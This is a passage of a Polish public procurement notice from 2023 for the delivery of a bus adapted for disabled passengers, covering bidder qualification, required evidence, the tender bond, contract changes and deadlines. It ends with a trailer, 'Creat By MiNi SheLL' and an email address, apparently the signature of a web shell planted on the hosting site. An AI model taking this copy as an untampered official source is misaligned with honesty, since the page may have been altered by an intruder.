postępowaniu.<br/>8.2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Nie dotyczy<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Nie dotyczy<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Nie dotyczy<br/>4) zdolności technicznej lub zawodowej:<br/>a) dotyczącej Wykonawcy:<br/>W zakresie spełnienia warunku wymagane jest:<br/>Wykazanie się wykonaniem nie wcześniej niż w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie: minimum dwie dostawy samochodu typu bus, przystosowanego<br/>do przewozu osób niepełnosprawnych,<br/>Jeżeli w dokumentach składanych w celu potwierdzenia spełniania warunków udziału<br/>w postępowaniu, kwoty będą wyrażane w walucie obcej, kwoty te zostaną przeliczone na PLN wg średniego kursu PLN w<br/>stosunku do walut obcych ogłaszanego przez Narodowy Bank Polski (Tabela A kursów średnich walut obcych) w dniu<br/>publikacji ogłoszenia<br/>w UZP.<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu lub kryteriów selekcji dotyczących<br/>zdolności technicznej lub zawodowej, zamawiający może, w zależności od charakteru, znaczenia, przeznaczenia lub<br/>zakresu robót budowlanych, dostaw lub usług, żądać następujących podmiotowych środków dowodowych:<br/>Wykazu dostaw wykonywanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których<br/>dostawy te zostały wykonane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane należycie, przy<br/>czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przed podmiot, na rzecz którego<br/>dostawy zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – inne odpowiednie dokumenty.<br/>Wzór wykazu dostaw stanowi Załącznik nr 6 do SWZ<br/>b) dotyczącej osób skierowanych przez Wykonawcę do realizacji zamówienia:<br/>Nie dotyczy<br/>8.3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>roboty budowlane, dostawy lub usługi, do realizacji których te zdolności są wymagane.<br/>8.4. Oceniając zdolność techniczną lub zawodową, zamawiający może, na każdym etapie postępowania, uznać, że<br/>wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze<br/>wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">10.1. Zamawiający żąda<br/>podmiotowych środków dowodowych w celu potwierdzenia braku podstaw wykluczenia oraz spełniania warunków udziału w<br/>postępowaniu.<br/>10.2. Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp nie jest podmiotowym środkiem dowodowym i stanowi dowód<br/>potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w postępowaniu, odpowiednio na dzień składania ofert,<br/>Ogłoszenie nr 2023/BZP 00352102/01 z dnia 2023-08-11<br/>2023-08-11 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe.<br/>10.3. Oświadczenie, o którym mowa w pkt 10.2. Wykonawca zobowiązany jest złożyć, zgodnie ze wzorem, określonym formularzem<br/>Zał. nr 4 do SWZ. (Wzór oświadczenia Wykonawcy o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu) na<br/>zasadach określonych w pkt. 14.<br/>10.4. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni, od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>10.5. Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, Zamawiający może<br/>na każdym etapie postępowania wezwać Wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych,<br/>aktualnych na dzień ich złożenia.<br/>10.6. Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki dowodowe nie są już aktualne,<br/>zamawiający może w każdym czasie wezwać wykonawcę lub wykonawców do złożenia wszystkich lub niektórych podmiotowych<br/>środków dowodowych, aktualnych na dzień ich złożenia.<br/>10.7. W celu potwierdzenia braku podstaw wykluczenia z udziału w postępowaniu o udzielenie zamówienia Wykonawca składa:<br/>a) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie<br/>podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w art. 108 ust. 1 ustawy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">10.8. W<br/>celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu Wykonawca składa:<br/>a) wykaz dostaw wykonanych nie wcześniej niż w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz<br/>podmiotów, na rzecz których dostawy te zostały wykonane, oraz załączeniem dowodów określających, czy te dostawy zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na<br/>rzecz którego dostawy zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych<br/>dokumentów – inne odpowiednie dokumenty;<br/>10.9. Jeżeli złożone przez Wykonawcę oświadczenie, o którym mowa w pkt. 10.2. lub podmiotowe środki dowodowe budzą<br/>wątpliwości Zamawiającego, może on zwrócić się bezpośrednio do podmiotu, który jest w posiadaniu informacji lub dokumentów<br/>istotnych w tym zakresie dla oceny spełniania przez Wykonawcę warunków udziału w postępowaniu lub braku podstaw wykluczenia,<br/>o przedstawienie takich informacji lub dokumentów.<br/>10.10. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli<br/>Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>10.11. Jeżeli Wykonawca nie złożył oświadczenia, o którym mowa w art. 125 ust. 1, podmiotowych środków dowodowych, innych<br/>dokumentów lub oświadczeń składanych w postępowaniu<br/>lub są one niekompletne lub zawierają błędy, zamawiający wzywa wykonawcę odpowiednio<br/>do ich złożenia, poprawienia lub uzupełnienia w wyznaczonym terminie, chyba że:<br/>-wniosek o dopuszczenie do udziału w postępowaniu albo oferta wykonawcy podlegają odrzuceniu bez względu na ich złożenie,<br/>uzupełnienie lub poprawienie lub<br/>-zachodzą przesłanki unieważnienia postępowania.<br/>10.12. Wykonawca składa podmiotowe środki dowodowe na wezwanie, o którym mowa w art. 128 ust. 1 Ustawy Pzp, aktualne na<br/>dzień ich złożenia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 8.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają określone<br/>przez zamawiającego warunki udziału w postępowaniu.<br/>8.2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Nie dotyczy<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Nie dotyczy<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Nie dotyczy<br/>4) zdolności technicznej lub zawodowej:<br/>a) dotyczącej Wykonawcy:<br/>W zakresie spełnienia warunku wymagane jest:<br/>Wykazanie się wykonaniem nie wcześniej niż w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie: minimum dwie dostawy samochodu typu bus, przystosowanego<br/>do przewozu osób niepełnosprawnych,<br/>b) dotyczącej osób skierowanych przez Wykonawcę do realizacji zamówienia:<br/>Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 11.1. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz<br/>w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub<br/>sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących<br/>go z nim stosunków prawnych.<br/>11.2. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy<br/>mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane, dostawy<br/>lub usługi, do realizacji których te zdolności są wymagane.<br/>Ogłoszenie nr 2023/BZP 00352102/01 z dnia 2023-08-11<br/>2023-08-11 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>11.3. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby na zasadach określonych<br/>w art. 118 ustawy Pzp, składa wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że<br/>Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>11.4. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w pkt 11.3, potwierdza, że stosunek łączący<br/>Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w<br/>szczególności:<br/>1) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje<br/>roboty budowlane, dostawy lub usługi, których wskazane zdolności dotyczą.<br/>11.5. Zamawiający oceni, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub<br/>zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków<br/>udziału w postępowaniu, a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały<br/>przewidziane względem wykonawcy.<br/>Pozostałe informacje w pkt. 11 SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 18.1. Zamawiający żąda wadium w wysokości 1 000,00 zł na zasadach określonych w art. 97 Pzp<br/>18.2. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących for-mach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 li-stopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>18.3 Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego<br/>nr 50 9159 1049 2002 1000 0130 0004<br/>18.4. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br/>18.5. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 18.2 ppkt 2–4, wykonawca<br/>przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 13.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>13.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp oraz na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego, natomiast spełnianie warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z pkt<br/>8.2.<br/>13.3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w pkt.<br/>10.2składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu.<br/>13.4. W przypadku, gdy spełnienie warunku opisanego w pkt. 8.2. wykonawcy wykazują poprzez poleganie na zdolnościach<br/>tych z wykonawców, którzy wykonają roboty budowlane, dostawy lub usługi, do realizacji których te zdolności są wymagane.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w formularzu ofertowym, składają oświadczenie z którego<br/>wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>13.5. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani na wezwanie<br/>Zamawiającego złożyć aktualne na dzień złożenia podmiotowe środki dowodowe, o których mowa w pkt 10, przy czym:<br/>1) podmiotowe środki dowodowe o których mowa w pkt 10.8. składa odpowiednio Wykonawca/Wykonawcy, który/którzy<br/>wykazuje/ą spełnianie warunku, w zakresie i na zasadach opisanych w pkt 8.2;<br/>2) dokumenty i oświadczenia o których mowa w pkt 10.7. składa każdy z nich. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> ZMIANA TREŚCI UMOWY<br/>§ 10<br/>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano<br/>wyboru Wykonawcy, chyba że zmiana będzie dotyczyła następujących zdarzeń:<br/>1. Zmiany o charakterze administracyjnym<br/>a) zmiana siedziby stron umowy i numeru rachunku bankowego<br/>b) powierzenia, zmiany lub rezygnacji z podwykonawców<br/>2. Zmiana wynagrodzenia w przypadku ustawowej zmiany stawki podatku od towaru i usług w trakcie realizacji umowy – w<br/>zakresie dotyczącym niezrealizowanej części umowy wynagrodzenie (brutto) zostanie odpowiednio zmodyfikowane,<br/>3. Zmiana terminu realizacji zamówienia:<br/>a) w przypadku siły wyższej, to znaczy niezależne od Stron losowe zdarzenie zewnętrzne, które było niemożliwe do<br/>przewidzenia w momencie wystawiania zlecenia i któremu nie można było zapobiec mimo dochowania należytej<br/>staranności. Pod pojęciem siły wyższej Zamawiający rozumie zwłaszcza: wojnę, zamach terrorystyczny, katastrofy<br/>naturalne, pożar, powódź, trzęsienie ziemi, huragan, strajk, zagrożenie epidemiologiczne;<br/>b) konieczność zmiany terminów umownych, jeśli konieczność ta nastąpiła na skutek okoliczności leżących po stronie<br/>Zamawiającego, których nie dało się przewidzieć mimo dochowania należytej staranności.<br/>4. Zmiany technologiczne spowodowane w szczególności następującymi okolicznościami:<br/>a) dostarczenie, po uprzednim uzgodnieniu z Zamawiającym, samochodu w analogicznym typie, marce i modelu,<br/>ulepszonego/ doposażonego o dodatkowe elementy w toku produkcji danego modelu w stosunku do samochodu, opisanego<br/>w § 1. ust. 1, ale w cenie nie wyższej niż cena określona w ofercie. Wykonawca zapewni, że zmiana parametrów<br/>technicznych samochodu nie będzie miała wpływu na zmianę warunków gwarancji oraz nie pogorszy funkcji użytkowanego<br/>Samochodu. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-04 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ranizow.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-04 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-03</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com